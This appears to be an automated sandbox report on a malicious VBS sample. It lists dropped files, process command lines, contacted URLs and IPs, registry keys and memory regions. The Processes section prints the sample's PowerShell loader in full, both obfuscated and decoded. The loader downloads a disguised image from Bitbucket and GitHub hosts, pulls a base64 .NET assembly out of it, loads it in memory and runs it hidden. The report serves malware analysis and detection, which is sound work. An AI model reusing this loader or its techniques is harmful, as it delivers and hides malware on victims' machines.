Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
3o2WdGwcLF.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1uqzgo10.p3d.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bfcf3i4t.er2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmqb2xx4.4dh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxz1jb1o.wep.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qo3mmnju.vra.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skmifo3j.eli.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\3o2WdGwcLF.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#C##d#B4#HQ#LgBj#HI#aQBq#EY#awBG#C8#cwBk#GE#bwBs#G4#dwBv#GQ#LwBm#Hc#Zg#v#Hc#ZgBz#GY#dwBm#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe
$OWjuxD .exe -windowstyle hidden -exec
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient;
$shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try
{ return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735',
'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);
$startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag);
$endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex
+= $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex,
$base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);
$type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]]
(' txt.crijFkF/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden
-exec
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/734f165bd448/jsi18n/en/dj
|
unknown
|
||
|
https://admin.atlassian.com
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://bitbucket.org/blog/migrating-pipelines-1-2x-steps-to-our-new-ci-cd-runtime
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/734f165bd448/img/default_
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/734f165bd448/css/themes/a
|
unknown
|
||
|
https://api.bitbucket.org
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
|
unknown
|
||
|
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
https://preferences.atlassian.com
|
unknown
|
||
|
https://www.atlassian.com/try/cloud/signup?bundle=bitbucket
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/734f165bd448/css/entry/ad
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/734f165bd448/
|
unknown
|
||
|
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
|
unknown
|
||
|
https://bitbucket.status.atlassian.com/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723
|
185.199.109.133
|
||
|
https://id.atlassian.com/profile/rest/profile"
|
unknown
|
||
|
https://aui-cdn.atlassian.com/
|
unknown
|
||
|
https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735
|
185.166.143.50
|
||
|
https://bitbucket.org/gateway/api/emoji/
|
unknown
|
||
|
https://bqlf8qjztdtr.statuspage.io
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://bitbucket.org
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/734f165bd448/css/entry/ap
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/734f165bd448/css/entry/ve
|
unknown
|
||
|
https://id.atlassian.com/login?prompt=login&continue=https%3A%2F%2Fbitbucket.org%2Fgdffffffff%2F
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/734f165bd448/img/logos/bi
|
unknown
|
||
|
https://id.atlassian.com/login
|
unknown
|
||
|
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://id.atlassian.com/logout
|
unknown
|
||
|
https://web-security-reports.services.atlassian.com/csp-report/bb-website
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelpX
|
unknown
|
||
|
https://dz8aopenkvv6s.cloudfront.net
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://id.atlassian.com/manage-profile/
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/734f165bd448/dist/webpack
|
unknown
|
||
|
https://bitbucket.org/gdffffffff/ddddd/downlo
|
unknown
|
||
|
https://raw.githubusercontent.com
|
unknown
|
||
|
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://cdn.cookielaw.org/
|
unknown
|
||
|
https://atlassianblog.wpengine.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=d
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
|
unknown
|
||
|
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://crl.my_
|
unknown
|
There are 49 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bitbucket.org
|
185.166.143.50
|
||
|
raw.githubusercontent.com
|
185.199.109.133
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.199.109.133
|
raw.githubusercontent.com
|
Netherlands
|
||
|
185.166.143.50
|
bitbucket.org
|
Germany
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
BBEC4B7000
|
stack
|
page read and write
|
||
|
2A681B73000
|
trusted library allocation
|
page read and write
|
||
|
23D45DF7000
|
heap
|
page read and write
|
||
|
7FFB4B100000
|
trusted library allocation
|
page read and write
|
||
|
2A6F9FD9000
|
heap
|
page read and write
|
||
|
2A682298000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AD7B000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B060000
|
trusted library allocation
|
page read and write
|
||
|
2A680FDE000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1CC000
|
trusted library allocation
|
page read and write
|
||
|
2A680418000
|
trusted library allocation
|
page read and write
|
||
|
26EDDA50000
|
heap
|
page read and write
|
||
|
2A6F7AF5000
|
heap
|
page read and write
|
||
|
2A6F7AB0000
|
heap
|
page read and write
|
||
|
2A6805DD000
|
trusted library allocation
|
page read and write
|
||
|
23D47A92000
|
heap
|
page read and write
|
||
|
23D47AB7000
|
heap
|
page read and write
|
||
|
26EDC16B000
|
heap
|
page read and write
|
||
|
7FFB4B070000
|
trusted library allocation
|
page read and write
|
||
|
23D4811F000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF00000
|
trusted library allocation
|
page read and write
|
||
|
2A680224000
|
trusted library allocation
|
page read and write
|
||
|
26EDC19E000
|
heap
|
page read and write
|
||
|
7FFB4AF70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A6F7AD8000
|
heap
|
page read and write
|
||
|
26EDC09C000
|
heap
|
page read and write
|
||
|
BBEC1F9000
|
stack
|
page read and write
|
||
|
26EDDEF0000
|
heap
|
page read and write
|
||
|
26EDC1BD000
|
heap
|
page read and write
|
||
|
26EDDF02000
|
heap
|
page read and write
|
||
|
7FFB4AD64000
|
trusted library allocation
|
page read and write
|
||
|
BBEC17E000
|
stack
|
page read and write
|
||
|
2A6F7CE0000
|
heap
|
page readonly
|
||
|
23D47D45000
|
trusted library allocation
|
page read and write
|
||
|
2A6F7B36000
|
heap
|
page read and write
|
||
|
4A52E3E000
|
stack
|
page read and write
|
||
|
BBED38C000
|
stack
|
page read and write
|
||
|
2A6F7D20000
|
trusted library allocation
|
page read and write
|
||
|
26EDC167000
|
heap
|
page read and write
|
||
|
2A6F7CB0000
|
trusted library allocation
|
page read and write
|
||
|
23D4815E000
|
trusted library allocation
|
page read and write
|
||
|
26EDC095000
|
heap
|
page read and write
|
||
|
2A6FA049000
|
heap
|
page read and write
|
||
|
7FFB4B040000
|
trusted library allocation
|
page read and write
|
||
|
2A6F7A40000
|
heap
|
page read and write
|
||
|
7FFB4AF20000
|
trusted library allocation
|
page read and write
|
||
|
23D45E01000
|
heap
|
page read and write
|
||
|
4A530BF000
|
stack
|
page read and write
|
||
|
2A6FA241000
|
heap
|
page read and write
|
||
|
26EDC126000
|
heap
|
page read and write
|
||
|
7FFB4AF40000
|
trusted library allocation
|
page execute and read and write
|
||
|
26EDDEF2000
|
heap
|
page read and write
|
||
|
7FFB4AFA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B000000
|
trusted library allocation
|
page read and write
|
||
|
26EDC16A000
|
heap
|
page read and write
|
||
|
2A6803E8000
|
trusted library allocation
|
page read and write
|
||
|
2A6F7B3B000
|
heap
|
page read and write
|
||
|
7FFB4B118000
|
trusted library allocation
|
page read and write
|
||
|
2A6F9610000
|
heap
|
page execute and read and write
|
||
|
23D47A20000
|
heap
|
page read and write
|
||
|
23D45D50000
|
heap
|
page read and write
|
||
|
23D47D31000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B030000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1A0000
|
trusted library allocation
|
page read and write
|
||
|
2A690031000
|
trusted library allocation
|
page read and write
|
||
|
26EDC1AD000
|
heap
|
page read and write
|
||
|
26EDC09A000
|
heap
|
page read and write
|
||
|
23D45DFD000
|
heap
|
page read and write
|
||
|
26EDDF02000
|
heap
|
page read and write
|
||
|
7DF413B10000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A6806DF000
|
trusted library allocation
|
page read and write
|
||
|
BBED20E000
|
stack
|
page read and write
|
||
|
26EDC0A0000
|
heap
|
page read and write
|
||
|
23D47B2E000
|
heap
|
page read and write
|
||
|
2A6F7AD1000
|
heap
|
page read and write
|
||
|
2A6FA02D000
|
heap
|
page read and write
|
||
|
7FFB4B1E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B222000
|
trusted library allocation
|
page read and write
|
||
|
23D47C8B000
|
trusted library allocation
|
page read and write
|
||
|
23D45FF0000
|
heap
|
page readonly
|
||
|
23D47A7C000
|
heap
|
page read and write
|
||
|
2A681CB1000
|
trusted library allocation
|
page read and write
|
||
|
23D45DBA000
|
heap
|
page read and write
|
||
|
7FFB4B010000
|
trusted library allocation
|
page read and write
|
||
|
23D47BF0000
|
heap
|
page read and write
|
||
|
4A52DB7000
|
stack
|
page read and write
|
||
|
26EDC1B4000
|
heap
|
page read and write
|
||
|
23D57C30000
|
trusted library allocation
|
page read and write
|
||
|
26EDC14F000
|
heap
|
page read and write
|
||
|
23D47CBD000
|
trusted library allocation
|
page read and write
|
||
|
26EDC153000
|
heap
|
page read and write
|
||
|
26EDC159000
|
heap
|
page read and write
|
||
|
26EDC1BD000
|
heap
|
page read and write
|
||
|
2A6F7DD0000
|
heap
|
page read and write
|
||
|
7FFB4AFB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B090000
|
trusted library allocation
|
page read and write
|
||
|
26EDC070000
|
heap
|
page read and write
|
||
|
26EDC180000
|
heap
|
page read and write
|
||
|
2A6F9C80000
|
heap
|
page read and write
|
||
|
23D45D40000
|
heap
|
page read and write
|
||
|
7FFB4AF90000
|
trusted library allocation
|
page read and write
|
||
|
23D47A17000
|
heap
|
page execute and read and write
|
||
|
26EDC180000
|
heap
|
page read and write
|
||
|
2A68144E000
|
trusted library allocation
|
page read and write
|
||
|
26EDC167000
|
heap
|
page read and write
|
||
|
BBEC43F000
|
stack
|
page read and write
|
||
|
7FFB4AFF0000
|
trusted library allocation
|
page read and write
|
||
|
2A6803F9000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B224000
|
trusted library allocation
|
page read and write
|
||
|
2A680799000
|
trusted library allocation
|
page read and write
|
||
|
23D47A85000
|
heap
|
page read and write
|
||
|
4A52E38000
|
stack
|
page read and write
|
||
|
7FFB4B110000
|
trusted library allocation
|
page read and write
|
||
|
BBEC7BE000
|
stack
|
page read and write
|
||
|
7FFB4AE46000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A690021000
|
trusted library allocation
|
page read and write
|
||
|
7DF413B00000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AFC0000
|
trusted library allocation
|
page read and write
|
||
|
BBEC37E000
|
stack
|
page read and write
|
||
|
23D47C10000
|
heap
|
page read and write
|
||
|
7FFB4AF30000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A6F7B0F000
|
heap
|
page read and write
|
||
|
4A52F3E000
|
stack
|
page read and write
|
||
|
7FFB4AF34000
|
trusted library allocation
|
page read and write
|
||
|
26EDC19E000
|
heap
|
page read and write
|
||
|
7FFB4AF90000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0E3000
|
trusted library allocation
|
page read and write
|
||
|
2A6F9F7A000
|
heap
|
page read and write
|
||
|
7FFB4AE20000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A6F7D70000
|
heap
|
page read and write
|
||
|
4A52CF9000
|
stack
|
page read and write
|
||
|
26EDC15F000
|
heap
|
page read and write
|
||
|
7FFB4B040000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B11C000
|
trusted library allocation
|
page read and write
|
||
|
BBEBDC3000
|
stack
|
page read and write
|
||
|
7FFB4B1B0000
|
trusted library allocation
|
page read and write
|
||
|
2A68228B000
|
trusted library allocation
|
page read and write
|
||
|
26EDC132000
|
heap
|
page read and write
|
||
|
2A681F90000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AD60000
|
trusted library allocation
|
page read and write
|
||
|
23D47D34000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23D48055000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B060000
|
trusted library allocation
|
page read and write
|
||
|
2A6FA01D000
|
heap
|
page read and write
|
||
|
2A681FA8000
|
trusted library allocation
|
page read and write
|
||
|
26EDC060000
|
heap
|
page read and write
|
||
|
23D4800A000
|
trusted library allocation
|
page read and write
|
||
|
2A6F9680000
|
heap
|
page read and write
|
||
|
26EDC1AE000
|
heap
|
page read and write
|
||
|
2A6F9EC0000
|
heap
|
page read and write
|
||
|
26EDC150000
|
heap
|
page read and write
|
||
|
7FFB4B1A3000
|
trusted library allocation
|
page read and write
|
||
|
B2DEFFD000
|
stack
|
page read and write
|
||
|
23D47B17000
|
heap
|
page read and write
|
||
|
23D47C21000
|
trusted library allocation
|
page read and write
|
||
|
2A680F4E000
|
trusted library allocation
|
page read and write
|
||
|
2A6F9EDC000
|
heap
|
page read and write
|
||
|
26EDC167000
|
heap
|
page read and write
|
||
|
7FFB4AE1C000
|
trusted library allocation
|
page execute and read and write
|
||
|
26EDC147000
|
heap
|
page read and write
|
||
|
7FFB4B0A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF70000
|
trusted library allocation
|
page read and write
|
||
|
23D48153000
|
trusted library allocation
|
page read and write
|
||
|
23D4805C000
|
trusted library allocation
|
page read and write
|
||
|
2A6FA230000
|
heap
|
page read and write
|
||
|
7FFB4AFD0000
|
trusted library allocation
|
page read and write
|
||
|
23D47D86000
|
trusted library allocation
|
page read and write
|
||
|
BBED30E000
|
stack
|
page read and write
|
||
|
23D45FE0000
|
trusted library allocation
|
page read and write
|
||
|
2A6F7AFB000
|
heap
|
page read and write
|
||
|
26EDDEF1000
|
heap
|
page read and write
|
||
|
26EDDEFB000
|
heap
|
page read and write
|
||
|
26EDC157000
|
heap
|
page read and write
|
||
|
7FFB4B010000
|
trusted library allocation
|
page read and write
|
||
|
23D46000000
|
trusted library allocation
|
page read and write
|
||
|
2A6F9616000
|
heap
|
page execute and read and write
|
||
|
2A6FA040000
|
heap
|
page read and write
|
||
|
7FFB4AF11000
|
trusted library allocation
|
page read and write
|
||
|
26EDC14F000
|
heap
|
page read and write
|
||
|
BBEC3F9000
|
stack
|
page read and write
|
||
|
7FFB4AF50000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A6803F5000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B120000
|
trusted library allocation
|
page read and write
|
||
|
2A6F7C80000
|
heap
|
page read and write
|
||
|
2A6FA003000
|
heap
|
